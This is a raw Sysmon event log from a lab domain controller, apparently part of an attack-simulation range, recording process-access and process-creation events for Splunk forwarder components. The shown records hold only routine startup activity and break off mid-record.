14:04:44.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:44.539{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-957C-6005-5D05-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:44.539{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-957C-6005-5D05-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:44.539{59A5CD1D-957C-6005-5D05-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.888{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-957D-6005-5F05-00000000A301}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.886{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.886{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.886{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.886{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.886{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-957D-6005-5F05-00000000A301}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.885{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-957D-6005-5F05-00000000A301}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.885{59A5CD1D-957D-6005-5F05-00000000A301}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.554{59A5CD1D-957D-6005-5E05-00000000A301}2201580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.399{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-957D-6005-5E05-00000000A301}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.399{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.399{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.399{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.399{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.399{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-957D-6005-5E05-00000000A301}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.399{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-957D-6005-5E05-00000000A301}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.399{59A5CD1D-957D-6005-5E05-00000000A301}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.976{59A5CD1D-957E-6005-6005-00000000A301}29603684C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.820{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-957E-6005-6005-00000000A301}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.820{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.820{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.820{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.820{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.820{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-957E-6005-6005-00000000A301}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.820{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-957E-6005-6005-00000000A301}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 